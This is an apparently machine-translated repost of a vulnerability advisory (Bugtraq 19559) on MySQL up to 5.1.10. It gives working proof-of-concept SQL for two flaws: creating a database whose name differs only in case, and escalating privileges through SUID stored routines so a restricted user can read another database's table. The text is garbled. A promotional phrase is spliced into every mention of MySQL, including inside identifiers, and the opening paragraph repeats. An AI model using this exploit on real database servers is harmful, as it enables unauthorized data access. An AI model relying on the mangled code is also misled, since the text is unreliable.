Discussion on MySQL permission escalation and security restrictions

The following articles mainly describe the actual application of MySQL permission escalation and security restriction bypass vulnerabilities. I saw the actual application of MySQL permission escalation and security restriction bypass vulnerabilities on the relevant website a few days ago, I think it's good. I will share it with you today. Affected Systems: MySQL (the best combination with PHP) ABMySQL (the best combination with PHP)

The following articles mainly describe the actual application of MySQL permission escalation and security restriction bypass vulnerabilities. I saw the actual application of MySQL permission escalation and security restriction bypass vulnerabilities on the relevant website a few days ago, I think it's good. I will share it with you today. Affected Systems: MySQL (the best combination with PHP) AB MySQL (the best combination with PHP)

The following articles mainly describe the actual application of MySQL permission escalation and security restriction bypass vulnerabilities. I saw the actual application of MySQL permission escalation and security restriction bypass vulnerabilities on the relevant website a few days ago, I think it's good. I will share it with you today.

Affected Systems:

MySQL (the best combination with PHP) AB MySQL (the best combination with PHP) <= 5.1.10

Description:

Bugtraq id: 19559

MySQL (the best combination with PHP) is a widely used open-source relational database system with running versions on various platforms.

In MySQL (the best combination with PHP), users with access permissions but no creation permissions can create new databases that are only different from those with names and letters. Successful exploitation of this vulnerability requires that the file system running MySQL (the best combination with PHP) support case-sensitive file names.

In addition, because the suid routine parameters are calculated in the wrong security environment, attackers can execute arbitrary DML statements with the permissions of the routine definer through stored routines. Successful attacks require you to have the EXECUTE permission on the stored routines.

Test method:

[Warning: The following procedures (methods) may be offensive and only used for security research and teaching. Users are at your own risk !]

1. Create a database

 
 

  
  
$ MySQL (the best combination with PHP)-h my. MySQL (the best combination with PHP). server-u sample-p-A sample
  
  
Enter password:
  
  
Welcome to the MySQL (the best combination with PHP) monitor. Commands end with; or \ g.
  
  
Your MySQL (best combination with PHP) connection id is 263935 to server version: 4.1.16-standard
  
  
MySQL (the best combination with PHP)> create database another;
  
  
ERROR 1044: Access denied for user 'sample' @ '%' to database 'another'
  
  
MySQL (the best combination with PHP)> create database sAmple;
  
  
Query OK, 1 row affected (0.00 sec)
 
 

2. Permission Improvement

 
 

  
  
-- Disable_warnings
  
  
Drop database if exists MySQL (the best combination with PHP) test1;
  
  
Drop database if exists MySQL (the best combination with PHP) test2;
  
  
Drop function if exists f_suid;
  
  
-- Enable_warnings
  
  
# Prepare playground
  
  
Create database MySQL (the best combination with PHP) test1;
  
  
Create database MySQL (the best combination with PHP) test2;
  
  
Create user malory @ localhost;
  
  
Grant all privileges on MySQL (the best combination with PHP) test1. * to malory @ localhost;
  
  
# Create harmless (but SUID !) Function
  
  
Create function f_suid (I int) returns int return 0;
  
  
Grant execute on function test. f_suid to malory @ localhost;
  
  
Use MySQL (the best combination with PHP) test2;
  
  
# Create table in which malory @ localhost will be interested but to which
  
  
# He won't have any access
  
  
Create table t1 (I int );
  
  
Connect (malcon, localhost, malory, MySQL (the best combination with PHP) test1 );
  
  
# Correct malory @ localhost don't have access to MySQL (the best combination with PHP) test2.t1
  
  
-- Error ER_TABLEACCESS_DENIED_ERROR
  
  
Select * from MySQL (the best combination with PHP) test2.t1;
  
  
# Create function which will allow to exploit security hole
  
  
Delimiter |;
  
  
Create function f_edevil ()
  
  
Returns int
  
  
SQL security invoker
  
  
Begin
  
  
Set @ a: = current_user ();
  
  
Set @ B: = (select count (*) from MySQL (the best combination with PHP) test2.t1 );
  
  
Return 0;
  
  
End |
  
  
Delimiter; |
  
  
# Again correct
  
  
-- Error ER_TABLEACCESS_DENIED_ERROR
  
  
Select f_edevil ();
  
  
Select @ a, @ B;
  
  
# Oops !!! It seems that f_edevil () is executed in the context
  
  
# F_suid () definer, so malory @ locahost gets all info that he wants
  
  
Select test. f_suid (f_edevil ());
  
  
Select @ a, @ B;
  
  
Connection default;
  
  
Drop user malory @ localhost;
  
  
Drop database MySQL (the best combination with PHP) test1;
  
  
Drop database MySQL (the best combination with PHP) test2;
 
 

Suggestion:

Vendor patch: MySQL (the best combination with PHP) AB. Currently, the vendor has released an upgrade patch to fix this security problem. Please download it from the vendor's homepage.